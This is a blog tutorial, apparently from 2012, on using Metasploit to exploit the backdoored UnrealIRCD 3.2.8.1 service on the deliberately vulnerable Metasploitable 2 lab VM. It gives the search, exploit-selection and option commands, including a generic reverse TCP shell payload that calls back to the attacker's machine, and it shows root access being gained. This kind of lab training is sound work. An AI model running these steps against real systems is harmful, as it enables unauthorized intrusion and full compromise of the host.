Metasploitable 2.0 Tutorial pt 3: Gaining Root from a Vulnerable Service

Friday, August 17, 2012

Dan Dieterle

B64e021126c832bb29ec9fa988155eaf

Continuing our tutorial series on Metasploitable 2, the purposefully vulnerable virtual machine used to learn security techniques, this time we will look at how to get root access from a vulnerable service.

We saw in previous tutorials how to scan a system for open ports with Nmap, and how to use Metasploit’s built in scanners to identify software revision levels.

I alluded to it earlier, so let’s take a look at UnrealIRCD sitting at port 6667. I chose this service for a few reasons. First of all there are numerous Metasploitable how-to’s out there, but a lot of them focus on the standard services.

Secondly, in real life, which is the service that will most likely go unpatched? The main web server or some secondary service that was installed for a project and then forgotten about?

So let’s get started! From the Nmap scan we saw this output for Unreal ircd:

(click image to enlarge)

Let’s take the version number and do a search to see if there are any vulnerabilities or exploits that we can take advantage of. We can search the web, or we can search inside Metasploit using the “search” command. Let’s look at both!

First a quick Google search for “Unreal3.2.8.1 exploit” returns this:

(click image to enlarge)

Cute, this version of UnrealIRCD had a backdoor added to it. Well I think this is definitely worth trying, especially as it has an “Excellent” Metasploit rank, which basically means the exploit is very stable and works consistently.

The exploit to use is listed further down Metasploit’s webpage, but we could find it by using the “Search” command in the Metasploit Framework as below:

(click image to enlarge)

As you can see there is only the one exploit in Metasploit for UnrealIRCD and it is the 3.2.8.1 backdoor exploit.

Excellent!

So, let’s “use” it and check the options:

(click image to enlarge)

All it needs is the remote host address:

set RHOST 192.168.12.20 (Metasploitable’s IP address)

Don’t forget to choose a payload for the exploit:

(click image to enlarge)

This command lists all the payloads that are compatible with this exploit. Unfortunately they are all command shell’s. A Meterpreter shell would be better than a command shell, and give us more options, but for now we will just use the generic reverse shell. This will drop us right into a terminal shell with the target when the exploit is finished.

set PAYLOAD generic/shell_reverse_tcp

For this payload all we need to do is set the LHOST command (the IP of our Backtrack Metasploit system) and then do a final “show options” to make sure everything is set okay:

(click image to enlarge)

Our RHOST (target) and LHOST (Attacker system that the shell will connect to) values are correctly set.

We are golden, now just type “exploit”:

(click image to enlarge)

Notice it says that a session is opened, but then it just gives you a blinking cursor. You are actually sitting in a terminal shell with the target machine. As you can see above, I typed “whoami” and the target system responded with “root”. The “Root” user is the highest level user that you can be on a Linux machine! It worked!

So to re-cap, we found an open service on the target machine. Searched for and found an exploit that works on the software version present. And finally, used the exploit and obtained a full remote shell.

All the standard Linux commands work with our shell that we have. But if you poke around a little bit, you will find that you are in the /etc/unreal directory (use the “pwd” command).  And it will not allow you out of this directory. Odd, but don’t forget that we are the Root user! We can make new users, or do almost anything else that we want.

In the next tutorial I will show you how to grab information from the Linux machine using our foothold that will allow us to access other existing accounts and further exploit the system.

Until next time!

Cross-posted from Cyber Arms

Possibly Related Articles:
30411
Network->General
Information Security
Hacking Penetration Testing Metasploit Nmap Network Security Tutorial Metasploitable Rooting UnrealIRCD
Post Rating I Like this!
Default-avatar
sam m Thanks for this interesting tutorial.
I tried to do the same thing you did, but I get:
"Exploit completed, but no session was created"
What do you think the problem is ??

I am using VirtualBox with two guest machines: BackTrack5 and Metasploitable.

Both VMs are connected with Host-only mode.

I appreciate your help.
1348415670
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.